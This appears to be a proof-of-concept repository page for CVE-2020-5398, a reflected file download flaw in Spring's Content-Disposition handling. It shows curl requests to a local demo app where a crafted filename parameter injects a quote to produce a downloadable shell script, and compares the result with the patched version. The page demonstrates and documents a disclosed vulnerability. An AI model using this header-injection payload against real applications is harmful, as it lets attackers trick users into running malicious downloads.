CVE-2020-5398 PoC — RFD Attack via "Content-Disposition" Header Sourced from Request Input by Spring MVC or Spring WebFlux Application

Source

Associated Vulnerability

Description

CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC

Readme

# CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC

> In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header in the response where the filename attribute is derived from user supplied input.

## Using

1.
```
./gradlew bootrun
```

Listen on `127.0.0.1:8080`.

2.
```
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World
```

Start download `sample.txt` file.

## PoC

### Insecure Version(Spring Web 5.2.2)

```
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id
```

Start download `sample.sh` file.(Shell file)

### Secure Version(Spring Web 5.2.3)

```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id
```

Start download `sample.sh";.txt` file.(Text file)

## References

- [CVE-2020-5398: RFD Attack via “Content-Disposition” Header Sourced from Request Input by Spring MVC or Spring WebFlux Application | Security | Pivotal](https://pivotal.io/security/cve-2020-5398)
- [NVD - CVE-2020-5398](https://nvd.nist.gov/vuln/detail/CVE-2020-5398)
- What's RFD Attack?
  - [eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf](https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf)
  - [Reflected File Download - OWASP](https://wiki.owasp.org/index.php/Reflected_File_Download)
- Fix Commit
  - [ContentDisposition refactoring · spring-projects/spring-framework@956ffe6](https://github.com/spring-projects/spring-framework/commit/956ffe68587c8d5f21135b5ce4650af0c2dea933)

File Snapshot

 [4.0K]  /data/pocs/27718de8d31e2aea7a1ce63c10fb1d9463dd1e88
├── [ 939]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 55K]  gradle-wrapper.jar
│       └── [ 232]  gradle-wrapper.properties
├── [5.2K]  gradlew
├── [2.2K]  gradlew.bat
├── [1.0K]  LICENSE.md
├── [2.3K]  README.md
├── [ 393]  settings.gradle
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   └── [4.0K]  com
    │   │       └── [4.0K]  example
    │   │           └── [4.0K]  cve_2020_5398
    │   │               ├── [4.0K]  controller
    │   │               │   └── [1.6K]  MainController.java
    │   │               └── [ 328]  Cve20205398Application.java
    │   └── [4.0K]  resources
    │       └── [   1]  application.properties
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  com
                └── [4.0K]  example
                    └── [4.0K]  cve_2020_5398
                        └── [ 222]  Cve20205398ApplicationTests.java

15 directories, 12 files

Remarks